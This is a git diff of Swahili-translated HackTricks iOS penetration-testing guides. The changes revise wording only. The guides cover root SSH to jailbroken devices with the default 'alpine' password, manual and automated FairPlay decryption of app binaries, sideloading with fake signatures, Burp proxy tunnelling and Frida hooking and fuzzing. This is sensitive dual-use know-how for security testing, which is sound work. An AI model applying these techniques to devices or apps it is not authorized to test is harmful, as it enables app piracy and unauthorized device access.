Kwa matoleo ya macOS kabla ya Catalina, iTunes inarahisisha kugundua UDID. Maelekezo ya kina yanaweza kupatikana [hapa](http://www.iclarified.com/52179/how-to-find-your-iphones-udid).
@ -29,20 +29,20 @@ $ system_profiler SPUSBDataType | sed -n -e '/iPad/,/Serial/p;/iPhone/,/Serial/p
```bash
$ instruments -s devices
```
### **Kupata Ufikiaji wa Shell ya Kifaa**
### **Kufikia Shell ya Kifaa**
**Ufikiaji wa SSH** umewezeshwa kwa kufunga **pakiti ya OpenSSH** baada ya jailbreak, kuruhusu muunganisho kupitia `ssh root@<device_ip_address>`. Ni muhimu kubadilisha nywila za msingi (`alpine`) kwa watumiaji `root` na `mobile` ili kulinda kifaa.
**Upatikanaji wa SSH** umewezeshwa kwa kufunga **pakiti ya OpenSSH** baada ya jailbreak, ikiruhusu muunganisho kupitia `ssh root@<device_ip_address>`. Ni muhimu kubadilisha nywila za msingi (`alpine`) kwa watumiaji `root` na `mobile` ili kulinda kifaa.
**SSH kupitia USB** inakuwa muhimu pindi Wi-Fi haipo, kwa kutumia `iproxy` kuunganisha bandari za kifaa kwa muunganisho wa SSH. Mpangilio huu unaruhusu ufikiaji wa SSH kupitia USB kwa kukimbia:
**SSH kupitia USB** inakuwa muhimu pindi Wi-Fi haitapatikana, ikitumia `iproxy` kubadilisha bandari za kifaa kwa muunganisho wa SSH. Mpangilio huu unaruhusu upatikanaji wa SSH kupitia USB kwa kukimbia:
```bash
$ iproxy 2222 22
$ ssh -p 2222 root@localhost
```
**Programu za shell kwenye kifaa**, kama NewTerm 2, zinawezesha mwingiliano wa moja kwa moja na kifaa, hasa ni muhimu kwa ajili ya kutatua matatizo. **Shell za Reverse SSH** zinaweza pia kuanzishwa kwa ajili ya ufikiaji wa mbali kutoka kwa kompyuta mwenyeji.
**Programu za shell kwenye kifaa**, kama NewTerm 2, husaidia katika mwingiliano wa moja kwa moja na kifaa, hasa ni muhimu kwa ajili ya kutatua matatizo. **Shell za Reverse SSH** zinaweza pia kuanzishwa kwa ajili ya ufikiaji wa mbali kutoka kwa kompyuta mwenyeji.
### **Kurekebisha Nywila Iliyosahaulika**
Ili kurekebisha nywila iliyosahaulika kurudi kwenye chaguo-msingi (`alpine`), kuhariri faili ya `/private/etc/master.passwd` ni muhimu. Hii inahusisha kubadilisha hash iliyopo na hash ya `alpine` karibu na entries za mtumiaji `root` na `mobile`.
Ili kurekebisha nywila iliyosahaulika kuwa ya kawaida (`alpine`), ni muhimu kuhariri faili ya `/private/etc/master.passwd`. Hii inahusisha kubadilisha hash iliyopo na hash ya `alpine` karibu na entries za mtumiaji `root` na `mobile`.
## **Mbinu za Uhamasishaji wa Data**
@ -70,19 +70,19 @@ file download <filename>
### **Kupata Faili la IPA**
**Kiungo cha Usambazaji wa Over-The-Air (OTA):** Programu zinazotolewa kwa ajili ya mtihani kupitia OTA zinaweza kupakuliwa kwa kutumia chombo cha kupakua mali za huduma za ITMS, ambacho kimewekwa kupitia npm na kinatumika kuhifadhi faili la IPA kwenye kifaa.
**Kiungo cha Usambazaji wa Over-The-Air (OTA):** Programu zinazotolewa kwa ajili ya mtihani kupitia OTA zinaweza kupakuliwa kwa kutumia zana ya kupakua mali za huduma za ITMS, ambayo imewekwa kupitia npm na inatumika kuhifadhi faili la IPA kwenye kifaa.
```bash
npm install -g itms-services
itms-services -u "itms-services://?action=download-manifest&url=https://s3-ap-southeast-1.amazonaws.com/test-uat/manifest.plist" -o - > out.ipa
```
### **Kutoa Binary ya App**
1. **Kutoka kwa IPA:** Fungua IPA ili kufikia binary ya app iliyotolewa.
2. **Kutoka kwa Kifaa kilichovunjwa:** Sakinisha app na toa binary iliyotolewa kutoka kwenye kumbukumbu.
1. **Kutoka kwa IPA:** Fungua IPA ili kufikia binary ya app iliyosimbwa.
2. **Kutoka kwa Kifaa kilichovunjwa:** Sakinisha app na toa binary iliyosimbwa kutoka kwenye kumbukumbu.
### **Mchakato wa Kufungua**
**Muhtasari wa Kufungua kwa Mikono:** Binary za app za iOS zimefungwa na Apple kwa kutumia FairPlay. Ili kufanya reverse-engineering, lazima mtu atoe binary iliyotolewa kutoka kwenye kumbukumbu. Mchakato wa kufungua unajumuisha kuangalia bendera ya PIE, kurekebisha bendera za kumbukumbu, kubaini sehemu iliyofungwa, na kisha kutoa na kubadilisha sehemu hii na fomu yake iliyotolewa.
**Muhtasari wa Kufungua kwa Mikono:** Binary za app za iOS zimefungwa na Apple kwa kutumia FairPlay. Ili kufanya reverse-engineering, lazima mtu atoe binary iliyosimbwa kutoka kwenye kumbukumbu. Mchakato wa kufungua unajumuisha kuangalia bendera ya PIE, kurekebisha bendera za kumbukumbu, kubaini sehemu iliyosimbwa, na kisha kutoa na kubadilisha sehemu hii na fomu yake iliyosimbwa.
**Kuangalia na Kubadilisha Bendera ya PIE:**
```bash
@ -90,26 +90,26 @@ otool -Vh Original_App
python change_macho_flags.py --no-pie Original_App
otool -Vh Hello_World
```
**Kutambua Sehemu Iliyosimbwa na Kutupa Kumbukumbu:**
**Kutambua Sehemu Iliyosimbwa na Kutoa Kumbukumbu:**
Tathmini anwani za mwanzo na mwisho za sehemu iliyosimbwa kwa kutumia `otool` na utupe kumbukumbu kutoka kwa kifaa kilichovunjwa kwa kutumia gdb.
Tathmini anwani za mwanzo na mwisho za sehemu iliyosimbwa kwa kutumia `otool` na toa kumbukumbu kutoka kwa kifaa kilichovunjwa kwa kutumia gdb.
```bash
otool -l Original_App | grep -A 4 LC_ENCRYPTION_INFO
dump memory dump.bin 0x8000 0x10a4000
```
**Kuweka Upya Sehemu Iliyosimbwa:**
**Kuweka Upya Sehemu ya Kificho:**
Badilisha sehemu iliyosimbwa katika binary ya asili ya programu na dump iliyofichuliwa.
Badilisha sehemu ya kificho katika binary ya asili ya programu na dump iliyotolewa.
```bash
dd bs=1 seek=<starting_address> conv=notrunc if=dump.bin of=Original_App
```
**Kumaliza Kufichua:** Badilisha metadata ya binary kuonyesha kutokuwepo kwa usimbaji kwa kutumia zana kama **MachOView**, ukipanga `cryptid` kuwa 0.
**Kumaliza Kufichua:** Badilisha metadata ya binary kuonyesha kutokuwepo kwa usimbuaji kwa kutumia zana kama **MachOView**, ukipanga `cryptid` kuwa 0.
### **Kufichua (Kiotomatiki)**
#### **frida-ios-dump**
Zana ya [**frida-ios-dump**](https://github.com/AloneMonkey/frida-ios-dump) inatumika kwa **kufichua na kutoa programu kiotomatiki** kutoka kwa vifaa vya iOS. Kwanza, mtu anapaswa kuunda mipangilio ya `dump.py` kuungana na kifaa cha iOS, ambayo inaweza kufanywa kupitia localhost kwenye bandari 2222 kupitia **iproxy** au moja kwa moja kupitia anwani ya IP ya kifaa na bandari.
Zana ya [**frida-ios-dump**](https://github.com/AloneMonkey/frida-ios-dump) inatumika kwa **kufichua na kutoa programu kiotomatiki** kutoka kwa vifaa vya iOS. Kwanza, mtu anapaswa kuunda `dump.py` kuungana na kifaa cha iOS, ambayo inaweza kufanywa kupitia localhost kwenye bandari 2222 kupitia **iproxy** au moja kwa moja kupitia anwani ya IP ya kifaa na bandari.
Programu zilizowekwa kwenye kifaa zinaweza kuorodheshwa kwa amri:
```bash
@ -132,7 +132,7 @@ flexdump dump Twitter.app
```
#### **bagbak**
[**bagbak**](https://github.com/ChiChou/bagbak), chombo kingine kinachotumia Frida, kinahitaji kifaa kilichovunjwa kwa ajili ya ufichuzi wa programu:
[**bagbak**](https://github.com/ChiChou/bagbak), chombo kingine kinachotumia Frida, kinahitaji kifaa kilichovunjwa ili kufungua programu:
```bash
bagbak --raw Chrome
```
@ -142,7 +142,7 @@ bagbak --raw Chrome
### **Kuweka Programu**
**Sideloading** inahusisha kufunga programu nje ya Duka rasmi la Programu. Mchakato huu unashughulikiwa na **installd daemon** na unahitaji programu zisainiwe kwa cheti kilichotolewa na Apple. Vifaa vilivyofanywa jailbroken vinaweza kupita hili kupitia **AppSync**, kuruhusu ufungaji wa pakiti za IPA zenye sahihi bandia.
**Sideloading** inahusisha kufunga programu nje ya Duka rasmi la Programu. Mchakato huu unashughulikiwa na **installd daemon** na unahitaji programu zisainiwe kwa cheti kilichotolewa na Apple. Vifaa vilivyofanywa jailbroken vinaweza kupita hili kupitia **AppSync**, kuruhusu ufungaji wa pakiti za IPA zenye saini bandia.
#### **Zana za Sideloading**
@ -156,9 +156,9 @@ bagbak --raw Chrome
- **Xcode**: Tumia Xcode kufunga programu kwa kuingia kwenye **Window/Devices and Simulators** na kuongeza programu kwenye **Installed Apps**.
#### **Ruhusu Ufunguzi wa Programu kwenye Vifaa Visivyo na iPad**
#### **Ruhusu Ufunga Programu kwenye Vifaa Visivyo na iPad**
Ili kufunga programu maalum za iPad kwenye vifaa vya iPhone au iPod touch, thamani ya **UIDeviceFamily** katika faili ya **Info.plist** inahitaji kubadilishwa kuwa **1**. Marekebisho haya, hata hivyo, yanahitaji kusaini tena faili ya IPA kutokana na ukaguzi wa uthibitisho wa sahihi.
Ili kufunga programu maalum za iPad kwenye vifaa vya iPhone au iPod touch, thamani ya **UIDeviceFamily** katika faili ya **Info.plist** inahitaji kubadilishwa kuwa **1**. Marekebisho haya, hata hivyo, yanahitaji kusaini tena faili ya IPA kutokana na ukaguzi wa uthibitisho wa saini.
**Kumbuka**: Njia hii inaweza kushindwa ikiwa programu inahitaji uwezo wa kipekee kwa mifano mipya ya iPad wakati ikitumia iPhone au iPod touch ya zamani.

12
src/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md
View File

@ -4,7 +4,7 @@
## Installing the Burp Certificate on iOS Devices
Ili kuchambua trafiki ya wavuti kwa usalama na SSL pinning kwenye vifaa vya iOS, Burp Suite inaweza kutumika ama kupitia **Burp Mobile Assistant** au kupitia usanidi wa mkono. Hapa kuna mwongozo wa muhtasari wa mbinu zote mbili:
Ili kuchambua trafiki ya wavuti kwa usalama na SSL pinning kwenye vifaa vya iOS, Burp Suite inaweza kutumika ama kupitia **Burp Mobile Assistant** au kupitia usanidi wa mikono. Hapa kuna mwongozo wa muhtasari wa mbinu zote mbili:
### Automated Installation with Burp Mobile Assistant
@ -36,13 +36,13 @@ iproxy 2222 22
ssh -R 8080:localhost:8080 root@localhost -p 2222
```
3. **Global Proxy Setting:** Hatimaye, sanidi mipangilio ya Wi-Fi ya kifaa cha iOS kutumia proxy ya mkono, ikielekeza trafiki yote ya wavuti kupitia Burp.
3. **Global Proxy Setting:** Mwishowe, sanidi mipangilio ya Wi-Fi ya kifaa cha iOS kutumia proxy ya mikono, ikielekeza trafiki yote ya wavuti kupitia Burp.
### Full Network Monitoring/Sniffing
Ufuatiliaji wa trafiki ya vifaa isiyo ya HTTP unaweza kufanywa kwa ufanisi kwa kutumia **Wireshark**, chombo kinachoweza kunasa aina zote za trafiki ya data. Kwa vifaa vya iOS, ufuatiliaji wa trafiki wa wakati halisi unarahisishwa kupitia uundaji wa Remote Virtual Interface, mchakato ulioelezwa katika [this Stack Overflow post](https://stackoverflow.com/questions/9555403/capturing-mobile-phone-traffic-on-wireshark/33175819#33175819). Kabla ya kuanza, usakinishaji wa **Wireshark** kwenye mfumo wa macOS ni sharti.
Ufuatiliaji wa trafiki isiyo ya HTTP ya kifaa unaweza kufanywa kwa ufanisi kwa kutumia **Wireshark**, chombo kinachoweza kunasa aina zote za trafiki ya data. Kwa vifaa vya iOS, ufuatiliaji wa trafiki wa wakati halisi unarahisishwa kupitia uundaji wa Remote Virtual Interface, mchakato ulioelezwa katika [this Stack Overflow post](https://stackoverflow.com/questions/9555403/capturing-mobile-phone-traffic-on-wireshark/33175819#33175819). Kabla ya kuanza, usakinishaji wa **Wireshark** kwenye mfumo wa macOS ni sharti.
Mchakato huu unajumuisha hatua kadhaa muhimu:
Mchakato unajumuisha hatua kadhaa muhimu:
1. Anzisha muunganisho kati ya kifaa cha iOS na mwenyeji wa macOS kupitia USB.
2. Thibitisha **UDID** ya kifaa cha iOS, hatua muhimu kwa ufuatiliaji wa trafiki. Hii inaweza kufanywa kwa kutekeleza amri kwenye Terminal ya macOS:
@ -50,7 +50,7 @@ Mchakato huu unajumuisha hatua kadhaa muhimu:
$ rvictl -s <UDID>
Starting device <UDID> [SUCCEEDED] with interface rvi0
```
3. Baada ya kubaini UDID, **Wireshark** inapaswa kufunguliwa, na kiolesura cha "rvi0" kuchaguliwa kwa ajili ya kukamata data.
3. Baada ya kubaini UDID, **Wireshark** inafunguliwa, na kiunganishi "rvi0" kinachaguliwa kwa ajili ya kukamata data.
4. Kwa ufuatiliaji wa lengo, kama vile kukamata trafiki ya HTTP inayohusiana na anwani maalum ya IP, Filters za Kukamata za Wireshark zinaweza kutumika:
## Usanidi wa Cheti cha Burp katika Simulator
@ -67,7 +67,7 @@ Katika _Proxy_ --> _Options_ --> _Export CA certificate_ --> _Certificate in DER
![](<../../images/image (1048).png>)
**Hongera, umefaulu kusanidi Cheti cha Burp CA katika simulator ya iOS**
**Hongera, umefanikiwa kusanidi Cheti cha Burp CA katika simulator ya iOS**
> [!NOTE]
> **Simulator ya iOS itatumia usanidi wa proxy wa MacOS.**

8
src/mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md
View File

@ -21,7 +21,7 @@ DECIMAL HEXADECIMAL DESCRIPTION
1430180 0x15D2A4 XML document, version: "1.0"
1458814 0x16427E XML document, version: "1.0"
```
Kwa upande mwingine, **radare2** inaweza kutumika kutekeleza amri kwa kimya na kutoka, ikitafuta nyuzi zote katika binary ya programu ambazo zina "PropertyList":
Kwa upande mwingine, **radare2** inaweza kutumika kutekeleza amri kwa kimya na kutoka, ikitafuta nyuzi zote katika binary ya programu zinazojumuisha "PropertyList":
```bash
$ r2 -qc 'izz~PropertyList' ./Telegram\ X
@ -30,12 +30,12 @@ $ r2 -qc 'izz~PropertyList' ./Telegram\ X
```
Mbinu zote mbili, binwalk na radare2, zinaruhusu uchimbaji wa faili za `plist`, huku ukaguzi wa wa kwanza (0x0015d2a4) ukionyesha urejeleaji wa mafanikio wa [faili ya awali ya entitlements kutoka Telegram](https://github.com/peter-iakovlev/Telegram-iOS/blob/77ee5c4dabdd6eb5f1e2ff76219edf7e18b45c00/Telegram-iOS/Telegram-iOS-AppStoreLLC.entitlements).
Kwa programu za binary zinazopatikana kwenye vifaa vilivyovunjwa (kwa mfano, kupitia SSH), amri ya **grep** pamoja na bendera `-a, --text` inaweza kutumika kutibu faili zote kama maandiko ya ASCII:
Kwa binaries za programu zinazopatikana kwenye vifaa vilivyovunjwa (kwa mfano, kupitia SSH), amri ya **grep** yenye bendera `-a, --text` inaweza kutumika kutibu faili zote kama maandiko ya ASCII:
```bash
$ grep -a -A 5 'PropertyList' /var/containers/Bundle/Application/...
```
Kurekebisha bendera `-A num, --after-context=num` kunaruhusu kuonyeshwa kwa mistari zaidi au chini. Njia hii inapatikana hata kwa binaries za programu zilizofichwa na imethibitishwa dhidi ya programu nyingi za App Store. Zana zilizotajwa hapo awali zinaweza pia kutumika kwenye vifaa vya iOS vilivyovunjwa kwa madhumuni sawa.
Kurekebisha bendera `-A num, --after-context=num` kunaruhusu kuonyeshwa kwa mistari zaidi au kidogo. Njia hii inafaa hata kwa binaries za programu zilizofichwa na imethibitishwa dhidi ya programu nyingi za App Store. Zana zilizoelezwa hapo awali zinaweza pia kutumika kwenye vifaa vya iOS vilivyovunjwa kwa madhumuni sawa.
**Kumbuka**: Matumizi ya moja kwa moja ya amri `strings` hayapendekezwi kwa kazi hii kutokana na mipaka yake katika kutafuta habari muhimu. Badala yake, kutumia grep na bendera `-a` kwenye binary au kutumia radare2 (`izz`)/rabin2 (`-zz`) inashauriwa kwa matokeo bora zaidi.
**Kumbuka**: Matumizi ya moja kwa moja ya amri `strings` hayapendekezwi kwa kazi hii kutokana na mipaka yake katika kupata habari muhimu. Badala yake, kutumia grep na bendera `-a` kwenye binary au kutumia radare2 (`izz`)/rabin2 (`-zz`) inashauriwa kwa matokeo bora zaidi.
{{#include ../../banners/hacktricks-training.md}}

12
src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md
View File

@ -13,10 +13,10 @@
4. Nenda kwenye chanzo kipya cha Frida kilichoongezwa.
5. Sakinisha pakiti ya Frida.
Ikiwa unatumia **Corellium** utahitaji kupakua toleo la Frida kutoka [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) (`frida-gadget-[yourversion]-ios-universal.dylib.gz`) na kufungua na nakala kwenye eneo la dylib ambalo Frida inahitaji, mfano: `/Users/[youruser]/.cache/frida/gadget-ios.dylib`
Ikiwa unatumia **Corellium** utahitaji kupakua toleo la Frida kutoka [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) (`frida-gadget-[yourversion]-ios-universal.dylib.gz`) na kufungua na nakala kwenye eneo la dylib ambalo Frida inahitaji, e.g.: `/Users/[youruser]/.cache/frida/gadget-ios.dylib`
Baada ya kufunga, unaweza kutumia kwenye PC yako amri **`frida-ls-devices`** na kuangalia kwamba kifaa kinaonekana (PC yako inahitaji kuwa na uwezo wa kukifikia).\
Tekeleza pia **`frida-ps -Uia`** kuangalia michakato inayoendesha ya simu.
Baada ya kusakinishwa, unaweza kutumia kwenye PC yako amri **`frida-ls-devices`** na kuangalia kwamba kifaa kinaonekana (PC yako inahitaji kuwa na uwezo wa kukifikia).\
Tekeleza pia **`frida-ps -Uia`** kuangalia michakato inayofanya kazi kwenye simu.
## Frida bila kifaa kilichovunjwa & bila kubadilisha programu
@ -76,7 +76,7 @@ console.log(className)
console.log("Objective-C runtime is not available.")
}
```
- Pata **mbinu** **zote** za **darasa** (chuja kwa nyuzi)
- Pata **mbinu** **zote** za **darasa** (chujio kwa nyuzi)
```javascript:/tmp/script.js
// frida -U <program> -l /tmp/script.js
@ -139,7 +139,7 @@ console.log("loaded")
Una mfano unaoonyesha jinsi ya kutekeleza Frida Stalker katika [https://github.com/poxyran/misc/blob/master/frida-stalker-example.py](https://github.com/poxyran/misc/blob/master/frida-stalker-example.py)
Huu ni mfano mwingine wa kuunganisha Frida Stalker kila wakati kazi inapoitwa:
Huu ni mfano mwingine wa kuunganisha Frida Stalker kila wakati kazi inaitwa:
```javascript
console.log("loading")
const wg_log_addr = Module.findExportByName("<Program>", "<function_name>")
@ -292,7 +292,7 @@ fpicker -v --fuzzer-mode active -e attach -p <Program to fuzz> -D usb -o example
> [!CAUTION]
> Katika kesi hii **haturejeshi programu au kurejesha hali** baada ya kila payload. Hivyo, ikiwa Frida itapata **crash** ingizo **lililofuata** baada ya payload hiyo linaweza pia **kusababisha programu kuanguka** (kwa sababu programu iko katika hali isiyo thabiti) hata kama **ingizo halipaswi kuangusha** programu.
>
> Zaidi ya hayo, Frida itashughulikia ishara za makosa za iOS, hivyo wakati **Frida itakapopata crash**, labda **ripoti za makosa za iOS hazitazalishwa**.
> Zaidi ya hayo, Frida itashughulikia ishara za makosa za iOS, hivyo wakati **Frida itakapopata crash**, labda **ripoti za makosa ya iOS hazitazalishwa**.
>
> Ili kuzuia hili, kwa mfano, tunaweza kurejesha programu baada ya kila crash ya Frida.

2
src/mobile-pentesting/ios-pentesting/ios-app-extensions.md
View File

@ -42,7 +42,7 @@ Programu zinaweza kupunguza aina fulani za extensions, hasa kibodi maalum, kuhak
Uchambuzi wa dynamic unahusisha:
- **Inspecting Shared Items**: Hook katika `NSExtensionContext - inputItems` ili kuona aina za data zilizoshirikiwa na asili zao.
- **Identifying Extensions**: Gundua ni extensions zipi zinazosindika data yako kwa kuangalia mitambo ya ndani, kama `NSXPCConnection`.
- **Identifying Extensions**: Gundua ni extensions zipi zinazoshughulikia data yako kwa kuangalia mifumo ya ndani, kama vile `NSXPCConnection`.
Vifaa kama `frida-trace` vinaweza kusaidia katika kuelewa michakato ya msingi, hasa kwa wale wanaovutiwa na maelezo ya kiufundi ya mawasiliano ya kati ya mchakato.

28
src/mobile-pentesting/ios-pentesting/ios-basics.md
View File

@ -2,24 +2,24 @@
# Kutenganisha Mamlaka na Sanduku
Katika iOS, kuna tofauti katika mamlaka kati ya programu zinazoweza kufikiwa na mtumiaji na michakato ya msingi ya mfumo. Programu zinafanya kazi chini ya utambulisho wa mtumiaji **`mobile`**, wakati michakato muhimu ya mfumo inafanya kazi kama **`root`**. Kutenganisha hii kunaboreshwa na mekanismu ya sandbox, ambayo inatoa mipaka madhubuti juu ya vitendo ambavyo programu zinaweza kuchukua. Kwa mfano, hata kama programu zinashiriki utambulisho sawa wa mtumiaji, zinakatazwa kufikia au kubadilisha data za kila mmoja.
Katika iOS, kuna tofauti katika mamlaka kati ya programu zinazoweza kufikiwa na mtumiaji na michakato ya msingi ya mfumo. Programu zinafanya kazi chini ya utambulisho wa mtumiaji **`mobile`**, wakati michakato muhimu ya mfumo inafanya kazi kama **`root`**. Kutenganisha hili kunaboreshwa na mekanismu ya sanduku, ambayo inatoa mipaka madhubuti juu ya vitendo ambavyo programu zinaweza kuchukua. Kwa mfano, hata kama programu zinashiriki utambulisho sawa wa mtumiaji, zinakatazwa kufikia au kubadilisha data za kila mmoja.
Programu zinawekwa katika directory maalum (`private/var/mobile/Applications/{random ID}`) na zina upatikanaji wa kusoma uliozuiliwa kwa maeneo na kazi fulani za mfumo, kama vile SMS na simu. Upatikanaji wa maeneo yaliyolindwa unachochea ombi la kuruka kwa ruhusa ya mtumiaji.
Programu zinawekwa katika directory maalum (`private/var/mobile/Applications/{random ID}`) na zina upatikanaji wa kusoma uliozuiliwa kwa maeneo na kazi fulani za mfumo, kama vile SMS na simu. Upatikanaji wa maeneo yaliyolindwa unachochea ombi la pop-up kwa ruhusa ya mtumiaji.
# Ulinzi wa Data
iOS inatoa waendelezaji **Data Protection APIs**, zilizojengwa juu ya Secure Enclave Processor (SEP) — coprocessor maalum kwa ajili ya operesheni za kificho na usimamizi wa funguo. SEP inahakikisha ulinzi wa data kupitia funguo maalum za kifaa, UID ya kifaa, iliyojumuishwa ndani yake.
Wakati wa kuunda faili, funguo ya kipekee ya AES ya bit 256 inazalishwa, ikificha maudhui ya faili. Funguo hii ya kificho, pamoja na ID ya darasa, kisha inafichwa kwa kutumia funguo ya darasa na kuhifadhiwa ndani ya metadata ya faili. Kufichua faili kunahusisha kutumia funguo ya mfumo kupata metadata, kupata funguo ya darasa na ID ya darasa, na kisha kufichua funguo ya kipekee ya kificho ya faili.
Wakati wa kuunda faili, funguo ya kipekee ya AES ya bit 256 inazalishwa, ikificha maudhui ya faili. Funguo hii ya kificho, pamoja na ID ya darasa, kisha inafichwa kwa kutumia funguo ya darasa na kuhifadhiwa ndani ya metadata ya faili. Kufichua faili kunahusisha kutumia funguo ya mfumo kufikia metadata, kupata funguo ya darasa na ID ya darasa, na kisha kufichua funguo ya kipekee ya kificho ya faili.
iOS inaelezea **darasa nne za ulinzi** kwa ajili ya usalama wa data, ambazo zinatofautisha wakati na jinsi data inaweza kufikiwa:
- **Ulinzi Kamili (NSFileProtectionComplete)**: Data haiwezi kufikiwa hadi kifaa kifunguliwe kwa kutumia nambari ya siri ya mtumiaji.
- **Ililindwa Isipokuwa Ifunguliwe (NSFileProtectionCompleteUnlessOpen)**: Inaruhusu upatikanaji wa faili hata baada ya kifaa kufungwa, ikiwa faili ilifunguliwa wakati kifaa kilifunguliwa.
- **Ililindwa Isipokuwa Iwapo Imefunguliwa (NSFileProtectionCompleteUnlessOpen)**: Inaruhusu upatikanaji wa faili hata baada ya kifaa kufungwa, ikiwa faili ilifunguliwa wakati kifaa kilifunguliwa.
- **Ililindwa Hadi Uthibitisho wa Kwanza wa Mtumiaji (NSFileProtectionCompleteUntilFirstUserAuthentication)**: Data inapatikana baada ya uthibitisho wa kwanza wa mtumiaji baada ya kuanzisha, ikibaki inapatikana hata kama kifaa kimefungwa tena.
- **Hakuna Ulinzi (NSFileProtectionNone)**: Data inalindwa tu na UID ya kifaa, ikiruhusu kufuta data kwa haraka kwa mbali.
Kificho cha madarasa yote, isipokuwa `NSFileProtectionNone`, kinahusisha funguo inayotokana na UID ya kifaa na nambari ya siri ya mtumiaji, kuhakikisha kwamba kufichua kunawezekana tu kwenye kifaa chenye nambari sahihi ya siri. Kuanzia iOS 7 na kuendelea, darasa la ulinzi la default ni "Ililindwa Hadi Uthibitisho wa Kwanza wa Mtumiaji".
Kufichwa kwa madarasa yote, isipokuwa `NSFileProtectionNone`, kunahusisha funguo inayotokana na UID ya kifaa na nambari ya siri ya mtumiaji, kuhakikisha kwamba kufichua kunawezekana tu kwenye kifaa chenye nambari sahihi ya siri. Kuanzia iOS 7 na kuendelea, darasa la ulinzi la default ni "Ililindwa Hadi Uthibitisho wa Kwanza wa Mtumiaji".
Waendelezaji wanaweza kutumia [**FileDP**](https://github.com/abjurato/FileDp-Source), chombo cha kuchunguza darasa la ulinzi wa data la faili kwenye iPhone.
```python
@ -32,7 +32,7 @@ python filedp.py /path/to/check
```
## **Keychain**
Katika iOS, **Keychain** inatumika kama **konteina salama iliyo na usimbuaji** kwa ajili ya kuhifadhi **taarifa nyeti**, inayoweza kufikiwa tu na programu iliyohifadhi taarifa hizo au zile zilizoidhinishwa wazi. Usimbuaji huu unalindwa na **nenosiri la kipekee lililotengenezwa na iOS**, ambalo lenyewe limefichwa kwa **AES**. Mchakato huu wa usimbuaji unatumia **PBKDF2 function**, ukichanganya nambari ya siri ya mtumiaji na chumvi inayotokana na **UID** ya kifaa, sehemu ambayo ni ya **secure enclave chipset** pekee inayoweza kufikiwa. Hivyo, hata kama nambari ya siri ya mtumiaji inajulikana, maudhui ya Keychain yanabaki kuwa hayapatikani kwenye kifaa kingine chochote isipokuwa kile ambacho yalifichwa hapo awali.
Katika iOS, **Keychain** inatumika kama **konteina salama iliyo na usimbuaji** kwa ajili ya kuhifadhi **taarifa nyeti**, inayoweza kufikiwa tu na programu iliyohifadhi taarifa hizo au zile zilizoidhinishwa wazi. Usimbuaji huu unalindwa na **nenosiri la kipekee lililotengenezwa na iOS**, ambalo lenyewe limefichwa kwa **AES**. Mchakato huu wa usimbuaji unatumia **PBKDF2 function**, ukichanganya nambari ya siri ya mtumiaji na chumvi inayotokana na **UID** ya kifaa, sehemu ambayo ni ya **secure enclave chipset** pekee inayoweza kufikiwa. Hivyo, hata kama nambari ya siri ya mtumiaji inajulikana, maudhui ya Keychain yanabaki kuwa yasiyoweza kufikiwa kwenye kifaa kingine chochote isipokuwa kile ambacho yalifichwa awali.
**Usimamizi na ufikiaji** wa data za Keychain unashughulikiwa na **`securityd` daemon**, kulingana na haki maalum za programu kama `Keychain-access-groups` na `application-identifier`.
@ -45,7 +45,7 @@ Keychain API, iliyoelezwa katika [Apple's Keychain Services documentation](https
- **`SecItemCopyMatching`**: Inapata kipengele kutoka kwenye Keychain.
- **`SecItemDelete`**: Inafuta kipengele kutoka kwenye Keychain.
Kujaribu kuvunja nenosiri la Keychain kunahusisha kushambulia funguo zilizofichwa moja kwa moja au kujaribu kukisia nambari ya siri kwenye kifaa chenyewe, ambayo inakabiliwa kwa kiasi kikubwa na utekelezaji wa kuchelewesha kutoka kwa secure enclave kati ya majaribio yasiyofanikiwa.
Kujaribu kuvunja nenosiri la Keychain kunahusisha ama kushambulia funguo zilizofichwa moja kwa moja au kujaribu kukisia nambari ya siri kwenye kifaa chenyewe, ambayo inakabiliwa kwa kiasi kikubwa na utekelezaji wa kuchelewesha wa secure enclave kati ya majaribio yasiyofanikiwa.
### **Configuring Keychain Item Data Protection**
@ -59,16 +59,16 @@ Viwango vya ulinzi wa data kwa vipengele vya Keychain vinakabiliwa kwa kutumia s
- **`kSecAttrAccessibleWhenUnlockedThisDeviceOnly`**: Inapatikana wakati kimefunguliwa, haijajumuishwa kwenye nakala za akiba.
- **`kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly`**: Inahitaji nambari ya siri ya kifaa, haijajumuishwa kwenye nakala za akiba.
**`AccessControlFlags`** zinaboresha zaidi mbinu za ufikiaji, kuruhusu uthibitishaji wa kibaiolojia au matumizi ya nambari ya siri.
**`AccessControlFlags`** zinaboresha zaidi mbinu za ufikiaji, kuruhusu uthibitisho wa kibaiolojia au matumizi ya nambari ya siri.
### **Jailbroken Devices Warning**
> [!WARNING]
> Kwenye **vifaa vilivyovunjwa**, ulinzi wa Keychain umeharibiwa, na kuleta hatari kubwa ya usalama.
> Kwenye **vifaa vilivyovunjwa**, ulinzi wa Keychain umeharibiwa, ukileta hatari kubwa ya usalama.
### **Persistence of Keychain Data**
Tofauti na data maalum za programu zinazofutwa wakati wa kufuta programu, **data za Keychain zinadumu** kwenye kifaa. Tabia hii inaweza kuwapa wamiliki wapya wa kifaa cha pili kupata data za programu za mmiliki wa zamani kwa urahisi kwa kurejesha programu. Wanakuza wanashauriwa kufuta data za Keychain kwa hiari wakati wa usakinishaji wa programu au wakati wa kutoka ili kupunguza hatari hii. Hapa kuna mfano wa msimbo wa Swift unaoonyesha jinsi ya kufuta data za Keychain wakati wa uzinduzi wa kwanza wa programu:
Tofauti na data maalum za programu zinazofutwa wakati wa kufuta programu, **data za Keychain zinadumu** kwenye kifaa. Tabia hii inaweza kuwapa wamiliki wapya wa kifaa cha pili ufikiaji wa data za programu za mmiliki wa awali kwa kuanzisha upya programu. Wanakuza wanashauriwa kufuta data za Keychain kwa hiari wakati wa usakinishaji wa programu au wakati wa kutoka ili kupunguza hatari hii. Hapa kuna mfano wa msimbo wa Swift unaoonyesha jinsi ya kufuta data za Keychain wakati wa uzinduzi wa kwanza wa programu:
```swift
let userDefaults = UserDefaults.standard
@ -86,7 +86,7 @@ Katika eneo la maendeleo ya programu, **sandboxing** ina jukumu muhimu katika ku
